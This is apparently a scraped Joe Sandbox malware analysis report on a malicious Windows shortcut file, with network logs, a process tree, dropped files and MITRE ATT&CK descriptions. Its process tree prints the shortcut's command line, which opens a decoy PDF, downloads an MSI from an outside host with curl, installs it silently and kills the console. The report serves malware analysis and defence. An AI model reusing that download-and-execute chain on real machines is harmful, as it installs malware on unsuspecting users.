74 70 73 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 62 69 6e 67 2e 63 6f Data Ascii: [{"age":2,"body":{"elapsed_time":2954,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"13.107.6.158","status_code":401,"type":"http.error"},"type":"network-error","url":"https://business.bing.co
2025-03-07 20:40:19 UTC	333	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Kestrel Date: Fri, 07 Mar 2025 20:40:19 GMT Connection: close PMUSER_FORMAT_QS: X-CDN-TraceId: 0.25b22817.1741380019.4bc39df Access-Control-Allow-Headers: * Access-Control-Allow-Credentials: false Access-Control-Allow-Methods: GET, OPTIONS, POST Access-Control-Allow-Origin: *

Timestamp	Bytes transferred	Direction	Data
2025-03-07 20:41:14 UTC	442	OUT	OPTIONS /api/report?cat=bingbusiness HTTP/1.1 Host: bzib.nelreports.net Connection: keep-alive Origin: https://business.bing.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-03-07 20:41:15 UTC	333	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Kestrel Date: Fri, 07 Mar 2025 20:41:14 GMT Connection: close PMUSER_FORMAT_QS: X-CDN-TraceId: 0.25b22817.1741380074.4bdce10 Access-Control-Allow-Headers: * Access-Control-Allow-Credentials: false Access-Control-Allow-Methods: GET, OPTIONS, POST Access-Control-Allow-Origin: *

Timestamp	Bytes transferred	Direction	Data
2025-03-07 20:41:17 UTC	382	OUT	POST /api/report?cat=bingbusiness HTTP/1.1 Host: bzib.nelreports.net Connection: keep-alive Content-Length: 466 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-03-07 20:41:17 UTC	466	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 35 39 37 36 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 32 30 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 33 2e 31 30 37 2e 36 2e 31 35 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 31 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 62 69 6e Data Ascii: [{"age":59761,"body":{"elapsed_time":3202,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"13.107.6.158","status_code":401,"type":"http.error"},"type":"network-error","url":"https://business.bin
2025-03-07 20:41:17 UTC	334	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Kestrel Date: Fri, 07 Mar 2025 20:41:17 GMT Connection: close PMUSER_FORMAT_QS: X-CDN-TraceId: 0.37b22817.1741380077.2b2e24e3 Access-Control-Allow-Headers: * Access-Control-Allow-Credentials: false Access-Control-Allow-Methods: GET, OPTIONS, POST Access-Control-Allow-Origin: *

Target ID:	1
Start time:	15:39:59
Start date:	07/03/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn \| Taskkill /f /im cmd.exe
Imagebase:	0x7ff6b0e60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	15:40:00
Start date:	07/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68dae0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	15:40:01
Start date:	07/03/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf
Imagebase:	0x7ff664de0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	7
Start time:	15:40:02
Start date:	07/03/2025
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn
Imagebase:	0x7ff7db580000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	15:40:03
Start date:	07/03/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	Taskkill /f /im cmd.exe
Imagebase:	0x7ff7e7210000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report thUKanu6GD.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\000312b9-65d1-4888-a5b8-76c54e272dc4.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\08499691-fe88-4ef0-afe1-690c16cdbb6d.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2b2d90b9-6ca4-40eb-a566-279137fff4a4.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\77726a78-ab09-460e-a813-1cba77c13a35.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\801fe37b-678c-45cb-88d5-c811f025212a.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\c3ad164a-8ab4-4587-ac4b-095d2b0319ed.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CB59A4-1810.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CB59A5-438.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0652a370-c405-4e04-88f4-9aad9e040fd8.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\2ba33c01-8ad1-4bb0-9362-49501484249d.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4e4b8c11-ee67-4ad5-81b0-6e5487794a99.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5567f0a4-cb45-4e4a-aa10-9c92565bf830.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7edbb9f2-d794-4656-b391-2ca20ac502c9.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8f0dbd1e-6e7a-4ba3-8451-238e13719db0.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\93602fcb-fce5-4df3-b854-6975be31e099.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Windows Analysis Report
thUKanu6GD.lnk

Target ID:	11
Start time:	15:40:05
Start date:	07/03/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=2088,i,11631974867291312252,14733990971221578511,262144 /prefetch:3
Imagebase:	0x7ff664de0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	17
Start time:	15:40:10
Start date:	07/03/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6272 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
Imagebase:	0x7ff664de0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	21
Start time:	15:40:11
Start date:	07/03/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
Imagebase:	0x7ff79b3c0000
File size:	1'255'976 bytes
MD5 hash:	F8CEC3E43A6305AC9BA3700131594306
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	24
Start time:	15:40:13
Start date:	07/03/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7416 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:6
Imagebase:	0x7ff664de0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	26
Start time:	15:41:06
Start date:	07/03/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6460 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
Imagebase:	0x7ff664de0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre